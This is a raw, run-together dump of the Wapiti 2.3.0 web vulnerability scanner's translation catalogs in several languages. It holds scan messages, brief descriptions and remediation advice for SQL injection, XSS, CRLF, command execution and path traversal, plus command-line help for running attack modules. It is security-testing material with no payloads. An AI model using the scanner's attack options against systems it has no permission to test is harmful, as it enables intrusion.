Der Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- Datei aus dem "scans"-Verzeichnis nutzen. --verify-ssl <0|1> Dieser Parameter zeigt an, ob Wapiti SSL-Zertifikate überprüfen soll. Standardmäßig werden diese überprüft -h --help Um diese Dokumentation anzuzeigen {0} : {1:>3} {0} HtAccess{0} in {1} durch Injektion in den Parameter {2}{0} in {1} durch Injektion in den Query-String{0} in {1} durch Injektion in den Ressourcenpfad{0} durch Injektion in den Parameter {1}{0} durch Injektion in den Query-String|HTTP Code: {0}|HTTP Code: {0} : {1}wapiti-2.3.0+dfsg/wapitiCore/config/language/en/000077500000000000000000000000001240201516300214625ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/en/LC_MESSAGES/000077500000000000000000000000001240201516300232475ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/en/LC_MESSAGES/wapiti.mo000066400000000000000000000521051240201516300251040ustar00rootroot00000000000000 .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted.
To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. 
Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been 
saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Inputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. 
To perform again the attack, launch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileIt may be possible to find backup files of scripts on the webserver that the web-admin put here to save a previous version or backup files that are automaticallygenerated by the software editor used (like for example Emacs). These copies may reveal interesting informations like source code or credentialsThe webadmin must manually delete the backup files or remove it from the web root. He should also reconfigure its editor to deactivate automatic backups.Backup file {0} found for {1}Blind SQL InjectionBlind SQL injection is a technique that exploits a vulnerability occurring in the database of an application. This kind of vulnerability is harder to detect than basic SQL injections because no error message will be displayed on the webpage.To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, user input must be escaped or filtered or parameterized statements must be used.Blind SQL vulnerabilityCRLF InjectionThe term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today's popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. This combination of CR and LR is used for example when pressing 'Enter' on the keyboard. Depending on the application being used, pressing 'Enter' generally instructs the application to start a new line, or to send a command.Check the submitted parameters and do not allow CRLF to be injected by filtering CRLFChoose the form you want to use :Command executionCommands executionThis attack consists in executing system commands on the server. 
The attacker tries to inject this commands in the request parametersPrefer working without user input when using file system callsConnection refused!Cross Site ScriptingCross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts.The best way to protect a web application from XSS attacks is ensure that the application performs validation of all headers, cookies, query strings, form fields, and hidden fields. Encoding user supplied output in the server side can also defeat XSS vulnerabilities by preventing inserted scripts from being transmitted to users in an executable form. Applications can gain significant protection from javascript based attacks by converting the following characters in all generated output to the appropriate HTML entity encoding: <, >, &, ", ', (, ), #, %, ; , +, -.DB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvaluation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingThis attack is also known as Path or Directory Traversal, its aim is the access to files and directories that are stored outside the web root folder. The attacker tries to explore the directories stored in the web server. The attacker uses some techniques, for instance, the manipulation of variables that reference files with 'dot-dot-slash (../)' sequences and its variations to move up to root directory to navigate through the file system.Prefer working without user input when using file system calls. Use indexes rather than actual portions of file names when templating or using language files (eg: value 5 from the user submission = Czechoslovakian, rather than expecting the user to return 'Czechoslovakian'). 
Ensure the user cannot supply all parts of the path - surround it with your path code. Validate the user's input by only accepting known good - do not sanitize the data. Use chrooted jails and code access policies to restrict where the files can be obtained or saved to.File disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess Bypasshtaccess files are used to restrict access to some files or HTTP method. In some case it may be possible to bypass this restriction and access the files.Make sure every HTTP method is forbidden if the credentials are bad.Interbase InjectionInternal Server ErrorAn error occured on the server's side, preventing it to process the request. 
It may be the sign of a vulnerability.More information about the error should be found in the server logs.Invalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous fileA file with potential vulnerabilities has been found on the website.Make sure the script is up-to-date and restrict access to it if possibleProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionIt took an abnormal time to the server to respond to a query. An attacker might leverage this kind of weakness to overload the serverThe involved script is maybe using the server resources (CPU, memory, network, file access...) in a non-efficient waySQL InjectionSQL injection vulnerabilities allow an attacker to alter the queries executed on the backend database. An attacker may then be able to extract or modify informations stored in the database or even escalate his privileges on the system.To protect against SQL injection, user input must not directly be embedded in SQL statements. 
Instead, user input must be escaped or filtered or parameterized statements must be used.Scan stopped, the data has been saved in the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}Wapiti-2.3.0 - Web application vulnerability scanner Usage: python wapiti.py http://server.com/base/url/ [options] Supported options are: -s --start To specify an url to start with. This option can be called several times. 
Wapiti will browse these links to find more URLs even if the specified link is not in the scope. -x --exclude To exclude an URL from the scan (eg: logout URLs). This option can be called several times to specify several URLs. Wildcards (*) can be used in URLs for basic regex. Example : -x http://server/base/?page=*&module=test or -x http://server/base/admin/* to exclude a directory. -p --proxy To specify a proxy. Currently supported proxies are HTTP and HTTPS. This option can be called twice to specify the HTTP and the HTTPS proxy. Example: -p http://proxy:port/ -c --cookie To import cookies to use for the scan. The cookie file must be in JSON format. Cookies can be grabbed using the cookie.py and getcookie.py utilities (net directory). -t --timeout To set the timeout (maximum time in seconds to wait for the server to send a response). -a --auth Set credentials for HTTP authentication. --auth-method If the server requires an authentication, set the authentication method to use. Currently supported methods are (some requires additional modules to install): + basic + digest + kerberos + ntlm -r --remove Remove a parameter (name and value) from URLs. -n --nice Define a limit of URLs to browse with the same pattern (ie, the maximum number of unique values for the same parameter). Use this option to prevent endless loops during scan. Limit must be greater than 0. -m --module Set the modules (and HTTP methods for each module) to use for attacks. Prefix a module name with a dash to deactivate the related module. To only browse the target (without sending any payloads), deactivate every module with -m "-all". If you don't specify the HTTP methods, GET and POST will be used. Example: -m "-all,xss:get,exec:post" -u --color Use colors to highlight vulnerabilities and anomalies in output. -v --verbose Set the verbosity level. 0: quiet (default), 1: print each URL, 2: print every attack. 
-b --scope Set the scope of the scan: + page: to analyse only the page given as the root URL. + folder: to analyse all the URLs under the root URL passed to Wapiti (default). + domain: to analyse all the links to the pages which are in the same domain as the URL passed to Wapiti. -f --format Set the format type for the report. json: Report in JSON format html: Report in HTML format (default) openvas: Report in OpenVAS XML format txt: Report in plain text (UTF-8) vulneranet: Report in VulneraNET (XML based) format xml: Report in XML format -o --output Set the name of the report file. If the selected report format is 'html', this parameter will be used as a directory name. -i --continue This parameter indicates to Wapiti to resume the previous scan saved in the specified XML status file. The file name is optional, if not specified, Wapiti takes the default file from the "scans" folder. -k --attack This parameter indicates to Wapiti to resume the attacks without scanning the website again, loading the scan status from the specified file. The file name is optional, if it is not specified, Wapiti takes the default file from the "scans" folder. --verify-ssl <0|1> This parameter indicates whether Wapiti must check SSL certificates. 
Default is to verify certificates -h --help To print this usage message {0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}
wapiti-2.3.0+dfsg/wapitiCore/config/language/es/LC_MESSAGES/wapiti.mo
.htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. 
To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLFCRLF descriptionCRLF injectionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. 
Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been 
saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: 2013-09-17 23:16+0200 Last-Translator: David del Pozo Gonzalez Language-Team: David del Pozo Gonzalez Alberto Pastor Nieto Language: Spanish MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Vulnerabilidad de bypass de .htaccess: {0} URL maliciosa: {0} viniendo de {0} * Inputs: * Método: {0} * Selects: * TextAreas: * URL escaneadas * URLs a escanear Aviso(QUERY_STRING)+ attackGET {0}+ attackPOST {0} de {1}Inyección .NET SQLSe ha generado un informe en el fichero {0}Inyección SQL en sistema AccessInyección Acess-Based SQLAnomalias encontradasProceso de ataque interrumpido. 
Para realizar el ataque de nuevo lance Wapiti con los parámetros "-i" o "-k".Vulnerabilidad de 'Local file disclosure' en BSDFichero de backupEs posible que se encuentren archivos de backup de los comandos ejecutados en el servidor que el administrador dejó para guardar una versión anterior o archivos de copia de seguridad que se generan automáticamente por editores de texto (como por ejemplo, Emacs). Estas copias pueden revelar código fuente o contraseñas.El administrador necesita borrar la copia de seguridad o moverla fuera de los directorios de la aplicación web. También debe desactivar las copias de seguridad automáticas en la configuración del editor de texto.Fichero de backup {0} encontrado para {1}Inyección SQL a ciegasLa inyección SQL a ciegas es una técnica que se aprovecha de una vulnerabilidad en la base de datos de la aplicación. Este tipo de vulnerabilidad es más difícil de detectar que una inyección SQL clásica ya que no muestra ningún mensaje en la web.Para proteger una aplicación de una inyección SQL, el usuario no debe utilizar consultas SQL directamente en el código. Los parámetros suministrados por el usuario deben ser escapados y filtrados. Las consultas deben estar parametrizadas.Inyección SQL ciegaCRLFEl término CRLF se refiere a 'Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n)' (en inglés). Esos caracteres se utilizan para indicar el final de una línea, sin embargo no todos los sistemas operativos los interpretan de la misma forma. Por ejemplo, en Windows, ambos, CR y LF son necesarios para marcar el final de la línea, mientras que en Linux/UNIX sólo LF es necesario. La combinación de CR y LF es usada por ejemplo cuando se presiona 'Enter'. 
Dependiendo de la aplicación, presionar 'Enter' crea una nueva línea o ejecuta un comando.Inyección CRLFComprobar los parámetros suministrados por el usuario y filtrar CR y LF.Elige el formulario que deseas usar:Ejecución de comandoEjecución de comandosEste ataque consiste en ejecutar comandos del sistema en el servidor. El atacante trata de inyectar comandos en los parámetros de la petición.Se debe evitar utilizar parámetros suministrados por el usuario en las llamadas al sistema de ficheros.Conexión rechazada!Cross Site ScriptingCross-site scripting (XSS) es un tipo de vulnerabilidad que normalmente se encuentra en aplicaciones web que permiten la inyección de código malicioso en páginas que son vistas por otros usuarios. Un ejemplo es la inyección de código HTML y javascript.La mejor forma de proteger una aplicación web de ataques XXS es asegurarse de que la aplicación valida todas las cabeceras, las cookies y todos los campos de los formularios (visibles y ocultos) que son enviados al servidor. También se debe validar toda la información que se manda al usuario desde el servidor para evitar que scripts inyectados puedan ejecutarse en los navegadores de otros usuarios. Una buena forma de proteger aplicaciones web de este tipo de ataques es convertir los siguientes caracteres en su equivalente en HTML: <, >, &, ", ', (, ), #, %, ; , +, -.Inyección DB2Fecha del escaneo: {0} Descargando de la web...Elige un número:Error descargando la base de datos NiktoError recuperando la URL {0}Error: El servidor no entendió esta peticiónEvalutation warningPetición maliciosa:Petición maliciosa: Excepción en lswww.browse: {0}Manejo de ficheroEste ataque también se conoce como 'Path Transversal' o 'Directory Transversal'. Su objetivo es acceder a ficheros y directorios que se encuentran fuera del directorio de la aplicación web. 
El atacante es capaz de acceder a los directorios del servidor utilizando distintas técnicas como por ejemplo la manipulación de variables que referencian a ficheros con secuencias de '../' para moverse por los directorios del servidor.Evite trabajar con información suministrada por el usuario cuando haga llamadas al sistema de ficheros. Use índices en vez de nombres o partes del nombre de los ficheros. Por ejemplo, utilice idioma=5 para acceder a la página en sueco en vez de utilizar idioma=sueco. Valide todos los parámetros suministrados por el usuario chequeando una lista de valores posibles. Utilice 'chrooted jails' y restrinja el acceso de los ficheros adecuadamente.Vulnerabilidad de 'Local file disclosure' en include_pathArchivo {0} cargado, el escaneo continua:Archivo {0} cargado. Wapiti lo usará para realizar el ataqueFichero {0} no encontrado, Wapiti escaneará el website de nuevoArchivo {0} no encontrado. Wapiti escaneará el website de nuevoEl primer argumento debe ser la URL raízFormulario {0}FormulariosInformación de los formularios¡Encontrado fichero de backup!Encontrado XSS permanente atacando {0} con campos {1}Encontrada XSS permanente en {0} con {1}De: {0}Protección HtAccess encontrada: {0}Bypass de HtaccessLos ficheros htaccess se usan para restringir el acceso de algunos ficheros o métodos HTTP. 
En algunos casos, es posible saltarse esta protección y acceder a los ficheros.Asegúrese de que todas las llamadas HTTP se prohiben en el caso en el que las credenciales sean incorrectas.Inyección InterbaseError interno del servidorUn error en el servidor que evita que se procese la petición puede ser una señal de que existe una vulnerabilidad.Investigue los logs del servidor en busca de información más detallada sobre el error.Argumento inválido para la opción {0} : {1}En argumento no es un enlace válido: {0}Protocolo inválido: {0}Parámetro involucrado: {0}Inyección Java.SQLInyección LDAPVulnerabilidad 'Local file disclosure' en LinuxInyección MSSQLCompruebe que la URL es correcta.Inyección MySQLNo se han encontrado formularios en esta páginaNo se han encontrado enlaces ni formularios en esta páginaAbrir {0}/index.html con el navegador para ver el informeInyección OracleEvaluación PHPPor favor, introduce valores para este formulario: Posible vulnerabilidad {0}Inyección PostgreSQLFichero potencialmente peligrosoUn fichero con vulnerabilidades se ha encontrado en el sitio web.Asegúrese de que el script se encuentra actualizado y de que sus permisos son lo más restrictivos posible.Problema con la base de datos local NiktoRecibido un error HTTP 500 en {0}Referencias:Vulnerabilidad de inclusión remotaInformeInforme para {0} Consumo de recursosAl servidor le llevó más tiempo de lo normal el responder a una consulta. 
Un atacante puede utilizar esta debilidad como un arma para sobrecargar al sistema.El script en cuestión puede que esté utilizando los recursos (CPU, memoria, acceso de ficheros, base de datos…) de una manera ineficiente.Inyección SQLLas vulnerabilidades SQL permiten al atacante alterar las queries que son ejecutadas en la base de datos.El atacante puede extraer o modificar la información de la base de datos o incluso obtener más privilegios en el sistema.Para protegerse de inyecciones SQL, los parámetros de usuario no se deben utilizar directamente para la crear la sentencia SQL. Esos parámetros se deben escapar o filtrar. Las consultas deben estar parametrizadas.Escaneo detenido, la información se ha salvado en el archivo {0}/{1}.xmlÁmbito del escaneo: {0} Código fuente:Guardada vulnerabilidad XSSResumen de vulnerabilidadesInyección SybaseTimeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en el parámetro {0}Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la query de la URLTimeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la ruta al recursoEl servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el parámetro {0}El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en la query de la URLEl servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el resource pathEste escaneo se ha guardado en el archivo {0}/{1}.xmlTimeout ocurrido en {0}Para continuar con este escaneo, debes lanzar Wapiti con el parámetro "-i"A: {0}URLsURLsSubida de scriptsScripts de subida encontrados:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Vulnerabilidad de 'Local file disclosure' en WindowsInyección XPathVulnerabilidad XSSVulnerabilidad XSS encontrada mediante inyección en el parámetro {0}Vulnerabilidad XSS encontrada mediante inyección en la query de la 
URLVulnerabilidad XSS encontrada mediante inyección en la ruta al recursoPuedes usarlo para realizar ataques sin escanear de nuevo el website mediante el parámetro "-k"[!] Dependencias no encontradas para el módulo {0}:[!] Imposible encontrar el módulo llamado {0}[*] Cargando modulos:[+] Lanzando módulo {0}cURL command PoC : "{0}"error: timeout mientras se atacaba {0}error: {0} mientras se realizaba el ataque {1}Vulnerabilidad highlight_file() en basedirinclude() de fichero en include_pathInyección preg_replaceurl = {0}Wapiti-2.3.0 - Web application vulnerability scanner Uso: python wapiti.py http://server.com/base/url/ [options] Las opciones soportadas son: -s --start Para indicar una URL con la que comenzar el escaneo. Esta opción puede ser usada varias veces. Wapiti escaneará esos enlaces para encontrar más URLs incluso si el enlace especificado no está en el ámbito. -x --exclude Para excluir una URL del escaneo (por ejemplo URLs de logout). Esta opción puede ser llamada varias veces para especificar varias URLs. Los comodines (*) se pueden usar en las URL como si fuesen expresiones regulares simples. Ejemplo : -x http://server/base/?page=*&module=test o -x http://server/base/admin/* para excluir un directorio. -p --proxy Para especificar un proxy. Actualmente los proxies soportados son HTTP y HTTPS. Esta opción puede ser llamada dos veces para especificar el proxy HTTP y HTTPS. Ejemplo: -p http://proxy:port/ -c --cookie Para importar cookies que se usarán en el escaneo. La cookie debe ser un fichero en formato JSON. Las cookies pueden ser generadas usando los programas cookie.py y getcookie.py (directorio "net"). -t --timeout Para establecer un timeout (tiempo máximo en segundo a esperar a la respuesta del servidor). -a --auth Establece las credenciales para la autentificación HTTP. --auth-method Si el servidor requiere autenticación, establece el método a usar en la autenticación. 
Actualmente los métodos soportados son (algunos requieren instalar módulos adicionales): + basic + digest + kerberos + ntlm -r --remove Borra un parámetro (nombre y valor) de las URLs. -n --nice Define un límite de URLs a escanear con el mismo patrón (por ejemplo, el número máximo de valores únicos para el mismo parámetro). Usa esta opción para prevenir bucles infinitos durante el escaneo. El límite debe ser mayor que 0. -m --module Establece los módulos (y métodos HTTP para cada módulo) para usar en los ataques. Prefix a module name with a dash to deactivate the related module. To only browse the target (without sending any payloads), deactivate every module with -m "-all". If you don't specify the HTTP methods, GET and POST will be used. Example: -m "-all,xss:get,exec:post" -u --color Usa colores para resaltar las vulnerabilidades y anomalias en la salida. -v --verbose Establece el nivel de logs por pantalla. 0: bajo (por defecto), 1: pinta cada URL, 2: pinta cada ataque. -b --scope Establece el ámbito del escaneo: + page: analiza solo la página pasada a Wapiti como URL raíz. + folder: analiza todas las URL bajo la misma URL raíz pasado a Wapiti (por defecto). + domain: analiza todos los enlaces a páginas que están en el mismo dominio que la URL pasada a Wapiti. -f --format Establece el formato del informe. json: Formato JSON format html: Formato HTML format (default) openvas: Formato OpenVAS XML txt: Informe en texto plano (UTF-8) vulneranet: Informe en formato VulneraNET (basado en XML) xml: Formato XML -o --output Establece el nombre del fichero con el informe. Si se selecciona HTML como formato del informe, este parámetro será el nombre del directorio donde se guarda el informe. -i --continue Este parámetro indica a Wapiti reanudar el escaneo previo guardado en el fichero XML especificado El nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta "scans". 
-k --attack Este parámetro indica a Wapiti reanudar los ataques sin escanear de nuevo el website, cargando el escaneo del fichero especificado. El nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta "scans". --verify-ssl <0|1> Este parámetro indica si Wapiti debe comprobar certificados SSL. Por defecto se verifican los certificados -h --help Para imprimir este mensaje de uso de la aplicación {0} : {1:>3} HtAccess {0}{0} en {1} mediante inyección en el parámetro {2}{0} en {1} mediante inyección en la query de la URL{0} en {1} mediante inyección en la ruta al recurso{0} mediante inyección en el parámetro {1}{0} mediante inyección en la query de la URL|Código HTTP: {0}|HTTP Code: {0} : {1}
wapiti-2.3.0+dfsg/wapitiCore/config/language/fr/LC_MESSAGES/wapiti.mo
.htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Note(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. 
